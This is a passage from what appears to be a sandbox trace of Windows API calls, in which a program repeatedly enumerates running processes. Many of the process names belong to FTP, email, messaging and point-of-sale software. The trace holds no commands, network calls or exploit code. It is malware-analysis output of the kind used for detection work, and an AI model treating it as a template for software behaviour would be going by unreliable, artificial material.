szExeFile="WmiPrvSE.exe")) returned 1 [0211.309] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0211.311] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.313] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.316] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0211.337] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0211.339] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0211.342] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0211.344] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0211.346] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0211.349] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0211.352] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0211.354] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0211.357] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0211.359] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0211.362] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0211.365] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0211.367] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0211.370] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0211.374] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0211.377] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0211.380] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0211.421] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0211.425] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0211.429] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0211.431] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0211.434] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0211.437] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0211.440] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0211.442] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0211.445] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0211.511] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0211.515] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0211.519] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0211.522] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0211.525] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0211.528] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0211.532] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0211.535] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0211.538] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0211.541] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0211.544] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0211.580] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0211.584] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0211.589] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0211.592] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0211.595] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0211.598] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0211.601] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0211.604] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0211.607] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0211.609] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0211.613] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0211.616] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0211.621] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0211.623] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0211.627] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0211.629] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0211.632] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0211.634] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0211.637] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0211.641] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0211.644] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0211.647] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0211.650] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0211.652] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0211.655] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0211.661] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0211.664] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0211.667] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0211.669] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0211.672] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.675] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0211.678] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0211.680] Process32Next (in: hSnapshot=0x2108, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0211.682] CloseHandle (hObject=0x2108) returned 1 [0211.683] Sleep (dwMilliseconds=0x64) [0211.819] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2130 [0211.836] Process32First (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.840] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.843] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.845] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.848] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.850] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.853] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.899] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.902] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.906] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.909] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: 